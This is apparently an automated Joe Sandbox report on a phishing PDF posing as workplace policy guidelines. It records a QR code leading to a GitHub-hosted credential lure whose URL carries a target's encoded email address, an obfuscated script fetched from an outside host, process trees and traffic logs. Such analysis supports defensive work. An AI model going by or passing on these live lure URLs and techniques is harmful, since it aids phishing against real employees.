Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf

Overview

General Information

Sample name:Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf
Analysis ID:1577087
MD5:282f1598a8f06e4bc477e8aabfa9d1d8
SHA1:baea7172738f06b00b9478ae434b4a1b78d39c81
SHA256:910d77445b561cdcfbefcbcec5bf7c97e0fd7a4dfc96abb38a0b0ea774e5aed0
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish78
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7416 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7604 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7800 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1604,i,16713143759588623167,3168251973281867099,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20= MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1948,i,12000973838117122200,13228138030383639485,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_181JoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
    dropped/chromecache_182JoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
      SourceRuleDescriptionAuthorStrings
      1.1..script.csvJoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 1.1..script.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_181, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_182, type: DROPPED
        Source: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=Joe Sandbox AI: Page contains button: 'Slide to verify' Source: '1.0.pages.csv'
        Source: PDF documentJoe Sandbox AI: PDF document contains QR code
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://roadmap27.github.io/policy-update-review-b... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution and potential data exfiltration. The use of the `atob` function to decode a heavily obfuscated string, which is then decrypted using a hardcoded key and written to the document, raises significant security concerns. This type of behavior is often associated with malicious scripts that attempt to execute arbitrary code or steal sensitive information. While the intent of the script is unclear, the combination of these high-risk indicators warrants a thorough review and a high-risk score.
        Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.larkus.ao/animal/script.js... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of the `eval` function, the transmission of potentially sensitive data to external domains, and the heavily encoded script content indicate a high likelihood of malicious intent. This script should be considered a significant security risk and should be further investigated or blocked from execution.
        Source: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=HTTP Parser: Base64 decoded: OD'=& 25<SJaYRDQP[~W]xETKEEEOG!?#TKG]xETKEEENGGCXADF^E_NTMBGJaEYSE_G:R(YVJaEYSE_E^PVK^PIJLWK[JDNJU...
        Source: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=HTTP Parser: No favicon
        Source: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=HTTP Parser: No favicon
        Source: Joe Sandbox ViewIP Address: 172.67.69.226 172.67.69.226
        Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewASN Name: ALABANZA-BALTUS ALABANZA-BALTUS
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/ HTTP/1.1Host: roadmap27.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/style.css HTTP/1.1Host: roadmap27.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/image/logo.png HTTP/1.1Host: roadmap27.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://roadmap27.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /animal/script.js HTTP/1.1Host: www.larkus.aoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://roadmap27.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/image/logo.png HTTP/1.1Host: roadmap27.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://roadmap27.github.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://roadmap27.github.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://roadmap27.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /animal/script.js HTTP/1.1Host: www.larkus.aoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /harrisassoc.com?size=400 HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://roadmap27.github.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://roadmap27.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: roadmap27.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://roadmap27.github.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://roadmap27.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /harrisassoc.com?size=400 HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: roadmap27.github.io
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.larkus.ao
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: ipapi.co
        Source: unknownHTTP traffic detected: POST /report/v4?s=Fu4V4TG6pcEcLP8N1pZSWTSNKKsjlofmYQ89bvK44sfdvgwfr3K6U7BPoECUrMEUVlbA17LN8lODsZVj6SELNl0hC6%2FUE0AjCso%2FLmSysGWk%2FusC9hyJJQpDO13B8OwsI5zl4Gpd HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 512Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 9115Server: GitHub.comContent-Type: text/html; charset=utf-8permissions-policy: interest-cohort=()ETag: "6758a043-239b"Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'X-GitHub-Request-Id: 4A2F:1790F1:D4D041:E466A1:6762092DAccept-Ranges: bytesAge: 0Date: Tue, 17 Dec 2024 23:28:45 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890092-NYCX-Cache: MISSX-Cache-Hits: 0X-Timer: S1734478126.758548,VS0,VE11Vary: Accept-EncodingX-Fastly-Request-ID: 7eaf1ad869c53947c7a348f35e3017f756a8f719
        Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
        Source: chromecache_178.5.drString found in binary or memory: https://fontawesome.com
        Source: chromecache_178.5.drString found in binary or memory: https://fontawesome.com/license/free
        Source: chromecache_176.5.drString found in binary or memory: https://githubstatus.com
        Source: chromecache_176.5.drString found in binary or memory: https://help.github.com/pages/
        Source: chromecache_176.5.drString found in binary or memory: https://twitter.com/githubstatus
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: classification engineClassification label: mal56.phis.winPDF@28/77@27/13
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-17 18-28-32-859.logJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf"
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1604,i,16713143759588623167,3168251973281867099,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1948,i,12000973838117122200,13228138030383639485,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1604,i,16713143759588623167,3168251973281867099,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1948,i,12000973838117122200,13228138030383639485,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
